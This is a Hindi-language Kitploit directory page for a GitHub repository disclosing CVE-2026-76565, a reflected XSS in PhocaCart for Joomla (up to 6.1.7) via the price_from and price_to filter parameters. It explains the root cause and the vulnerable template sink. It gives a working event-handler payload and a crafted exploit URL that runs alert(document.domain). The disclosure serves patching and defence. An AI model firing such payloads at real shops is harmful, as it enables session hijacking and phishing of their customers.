Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-76565 — PhocaCart में price_from और price_to फ़िल्टर पैरामीटर के माध्यम से रिफ्लेक्टेड XSS | Kitploit
उपकरण/GitHubGitHub/toanln-cov/cve-2026-76565
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेपर और शोध
GitHubtoanln-cov/cve-2026-76565

CVE-2026-76565

PhocaCart में price_from और price_to फ़िल्टर पैरामीटर के माध्यम से रिफ्लेक्टेड XSS

रिपॉजिटरी देखें
3 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PhocaCart में price_from / price_to फ़िल्टर पैरामीटर के माध्यम से Reflected XSS

PhocaCart ≤ 6.1.7 — बिना प्रमाणीकरण के हमलावर क्राफ्टेड मूल्य फ़िल्टर URL के माध्यम से मनमाना JavaScript इंजेक्ट करता है

CVE CVSS v4.0 CWE-79 Affected Researcher


सारांश

Joomla के लिए PhocaCart 6.1.7, mod_phocacart_filter मॉड्यूल इंस्टॉल और प्रकाशित होने पर price_from और price_to GET पैरामीटर के माध्यम से Reflected Cross-Site Scripting (XSS) के प्रति संवेदनशील है। पैरामीटर Joomla के 'string' इनपुट फ़िल्टर का उपयोग करके संसाधित किए जाते हैं, जो केवल strip_tags() लागू करता है — यह लागू नहीं करता। कच्चे मान मॉड्यूल द्वारा रेंडर किए गए मूल्य फ़िल्टर फ़ॉर्म में HTML विशेषताओं में सीधे प्रतिध्वनित होते हैं।

टूल डाउनलोड करें
htmlspecialchars()
mod_phocacart_filter
value=""

एक हमलावर पीड़ित को एक क्राफ्टेड URL भेजता है। जब पीड़ित पृष्ठ लोड करता है, तो इंजेक्ट किया गया event handler उनके ब्राउज़र में निष्पादित होता है। किसी प्रमाणीकरण की आवश्यकता नहीं है। हमले के लिए mod_phocacart_filter (एक अलग से वितरित मॉड्यूल) का इंस्टॉल और प्रकाशित होना आवश्यक है।


प्रभावित संस्करण

घटकअसुरक्षितपरीक्षण किया गयासमाधान
PhocaCart (com_phocacart) + mod_phocacart_filter≤ 6.1.7Joomla 5.4.7 + PhocaCart 6.1.7 + mod_phocacart_filter 6.1.66.1.8

भेद्यता विवरण

प्रकार: Reflected XSS (CWE-79) प्रमाणीकरण आवश्यक: नहीं — सार्वजनिक शॉप फ्रंटएंड CSRF टोकन आवश्यक: नहीं (GET अनुरोध) सिंक फ़ाइल: site/layouts/form_filter_horizontal_text.php:65,71

मूल कारण

Joomla का 'string' इनपुट फ़िल्टर strip_tags() कॉल करता है — यह HTML टैग हटाता है लेकिन ", ', और > जैसे HTML विशेष वर्णों को बिना एन्कोड किए छोड़ देता है। price_from और price_to GET पैरामीटर इस फ़िल्टर के साथ प्राप्त किए जाते हैं और $data['getparams'] में संग्रहीत किए जाते हैं। टेम्पलेट फ़ाइलें इन मानों को htmlspecialchars() कॉल किए बिना सीधे value="" विशेषताओं में प्रतिध्वनित करती हैं, जिससे एट्रिब्यूट-संदर्भ इंजेक्शन संभव होता है।

डेटा प्रवाह — स्रोत से सिंक तक:

root@kitploit:~
GET ?price_from=" onmouseover="alert(document.domain)

  filter.php:831    $app->getInput()->get('price_from', '', 'string')
  └─ Joomla 'string' filter = strip_tags() only
     strip_tags('" onmouseover="alert(1)') → '" onmouseover="alert(1)'  [unchanged!]

  filter.php:494    $inA[] = $v  // no encoding
  └─ $data['getparams'] = ['" onmouseover="alert(document.domain)']

  form_filter_horizontal_text.php:65:
  └─ <input type="text" value="<?php echo $d['getparams'][0]; ?>" /> // → NO htmlspecialchars()
  → Renders: value="" onmouseover="alert(document.domain)"
  → XSS fires on mouseover

FORM_FILTER_HORIZONTAL_TEXT.PHP:65 — असुरक्षित सिंक

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="<?php echo $d['getparams'][0]; ?>"   <!-- NO htmlspecialchars() -->
  id="phPriceFrom..." />

यही सिंक पैटर्न form_filter_text.php:81,87 (वर्टिकल लेआउट वैरिएंट) में भी मौजूद है। price_from और price_to दोनों पैरामीटर समान रूप से असुरक्षित हैं।


प्रूफ ऑफ कॉन्सेप्ट

1. दुर्भावनापूर्ण URL तैयार करना

हमलावर price_from पैरामीटर में इंजेक्ट किए गए event-handler पेलोड के साथ शॉप आइटम्स व्यू को लक्षित करने वाला URL बनाता है। पेलोड value="" एट्रिब्यूट संदर्भ से बाहर निकल जाता है।

root@kitploit:~
Payload (raw):     " autofocus onfocus="alert(document.domain)
URL-encoded:       %22%20autofocus%20onfocus%3D%22alert(document.domain)

Crafted URL:
http://TARGET/index.php?option=com_phocacart&view=items
  &price_from=%22%20autofocus%20onfocus%3D%22alert(document.domain)

2. पीड़ित पृष्ठ लोड करता है — पृष्ठ लोड होने पर XSS ट्रिगर होता है

जब पीड़ित क्राफ्टेड URL खोलता है, तो शॉप आइटम्स पृष्ठ मूल्य फ़िल्टर फ़ॉर्म रेंडर करता है। इंजेक्ट की गई विशेषताएँ <input> तत्व में मौजूद होती हैं। autofocus onfocus पेलोड के साथ, JavaScript पृष्ठ लोड होते ही बिना किसी और उपयोगकर्ता इंटरैक्शन के निष्पादित हो जाता है।

रेंडर किया गया HTML (असुरक्षित):

root@kitploit:~
<input type="text" class="form-control" name="pricefrom"
  value="" autofocus onfocus="alert(document.domain)"
  id="phPriceFromTopricefrom" />

XSS अलर्ट डायलॉग पीड़ित के ब्राउज़र में ट्रिगर होता है — alert(document.domain) शॉप फ्रंटएंड पर निष्पादन की पुष्टि करता है

XSS पीड़ित के ब्राउज़र में ट्रिगर होता है — alert(document.domain) शॉप फ्रंटएंड में निष्पादन संदर्भ की पुष्टि करता है


प्रभाव

  1. सत्र कुकी चोरी — एक हथियारबंद पेलोड पीड़ित की सत्र कुकी को हमलावर-नियंत्रित सर्वर पर एक्सफ़िलट्रेट कर सकता है, जिससे खाता अधिग्रहण संभव होता है।
  2. फ़िशिंग / क्रेडेंशियल हार्वेस्टिंग — पेलोड पीड़ित को हमलावर के डोमेन पर होस्ट किए गए नकली लॉगिन पृष्ठ पर रीडायरेक्ट कर सकता है, जो विश्वसनीय शॉप डोमेन नाम के तहत क्रेडेंशियल कैप्चर करता है।
  3. मैलवेयर वितरण — शॉप के विश्वसनीय ओरिजिन का दुरुपयोग उन पीड़ितों को ड्राइव-बाय डाउनलोड या एक्सप्लॉइट किट पहुँचाने के लिए किया जा सकता है जो हमलावर-निर्मित लिंक पर क्लिक करते हैं।

संदर्भ

  • CVE: https://www.cve.org/CVERecord?id=CVE-2026-76565
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-76565
  • GitHub सुरक्षा सलाह: https://github.com/advisories/GHSA-2m94-2f44-8q5p
  • विक्रेता रिपॉज़िटरी: https://github.com/PhocaDesign/PhocaCart